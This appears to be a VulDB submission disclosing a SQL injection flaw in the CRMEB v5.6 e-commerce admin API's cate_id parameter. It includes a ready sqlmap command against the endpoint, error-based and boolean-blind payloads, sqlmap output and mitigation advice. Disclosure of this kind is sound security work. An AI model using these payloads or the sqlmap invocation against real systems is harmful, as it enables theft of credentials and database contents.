| Title | CRMEB CRMEB 电商系统 v5.6 Vulnerability type: SQL Injection |
|---|
| Description | Title: SQL Injection in /adminapi/product/product — vulnerable cate_id parameter
The /adminapi/product/product endpoint in CRMEB v5.6 is vulnerable to SQL injection via the cate_id GET parameter. Unsanitized input is injected directly into SQL queries, allowing an attacker to manipulate the query logic. Automated testing with sqlmap confirmed the issue and identified both boolean-based blind and error-based injection techniques (backend DBMS fingerprinted as MySQL ≥ 5.6). Error-based vectors (e.g. functions that cause XPath/GTID errors) can be used to obtain direct database value leakage, and boolean/time-based techniques can be used when error output is suppressed.
Reproduction (summary):
1. Send a crafted GET request to /adminapi/product/product with a manipulated cate_id parameter.
2. The application returns SQL errors or exhibits boolean/time-based behaviour differences, demonstrating that user input reaches SQL execution.
Example indicative payloads (for verification only): a probe that produces a syntax error (cate_id=%E9%8E%88%27%22%5C%28) and MySQL error-based payloads (e.g. AND updatexml(1,concat(0x7e,(select database()),0x7e),1)) have been observed to produce exploitable responses. sqlmap automated testing confirmed cate_id as injectable and logged the findings.
Impact:
Successful exploitation can disclose sensitive database contents (database names, table names, rows such as user credentials, API keys, configuration data), and may lead to data exfiltration or further pivoting inside the application. The presence of both error- and boolean-based vectors increases exploitability and flexibility for an attacker.
Recommended mitigation:
• Treat cate_id as a numeric parameter server-side: validate and coerce it to an integer (reject non-numeric input).
• Use parameterized queries / prepared statements for all database access, and avoid string concatenation for SQL.
• Disable detailed SQL error messages in production responses; log errors internally instead.
• Apply least-privilege access for the database account and enforce strict access controls on admin APIs.
• Deploy input sanitization and WAF rules to block obvious SQL injection patterns and monitor for anomalous queries.
sqlmap :
sqlmap -u "http://xxxxx/adminapi/product/product? cate_id=1&is_gift=&limit=15&logistics=&page=1&price_s%5B%5D=&price_s%5B%5D=&sales_s%5B%5D=&sales_s%5B%5D=&spec_type=&stock_s%5B%5D=&stock_s%5B%5D=&store_name=&time=&type=1&vip_product=&virtual_type=" -p cate_id --headers="Authori-Zation: Bearer eyJ0xxxx\nCookie: PHPSESSID=xxxx; cb_lang=zh-cn" --batch --level=3 --risk=2 --threads=2 --timeout=10 --random-agent --dbms=mysql
The execution result of the sqlmap statement:
GET parameter 'cate_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 649 HTTP(s) requests:
---
Parameter: cate_id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cate_id=1 RLIKE (SELECT (CASE WHEN (1039=1039) THEN 1 ELSE 0x28 END))&is_gift=&limit=15&logistics=&page=1&price_s[]=&price_s[]=&sales_s[]=&sales_s[]=&spec_type=&stock_s[]=&stock_s[]=&store_name=&time=&type=1&vip_product=&virtual_type=
Type: error-based
Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
Payload: cate_id=GTID_SUBSET(CONCAT(0x7170787671,(SELECT (ELT(5044=5044,1))),0x716a7a7071),5044)&is_gift=&limit=15&logistics=&page=1&price_s[]=&price_s[]=&sales_s[]=&sales_s[]=&spec_type=&stock_s[]=&stock_s[]=&store_name=&time=&type=1&vip_product=&virtual_type=
---
[09:19:14] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.6
[09:19:16] [INFO] fetched data logged to text files under '/Users/xxxx/.local/share/sqlmap/output/xxxxx'
[*] ending @ 09:19:16 /2025-09-22/ |
|---|
| Source | ⚠️ https://github.com/coolcj-stack/CRMEB-V5.6-SQL-Injection/blob/main/README.md |
|---|
| User | BlackSpdier (UID 89912) |
|---|
| Submission | 09/22/2025 03:58 (9 months ago) |
|---|
| Moderation | 10/04/2025 13:30 (12 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 327046 [CRMEB up to 5.6 GET Parameter product cate_id sql injection] |
|---|
| Points | 20 |
|---|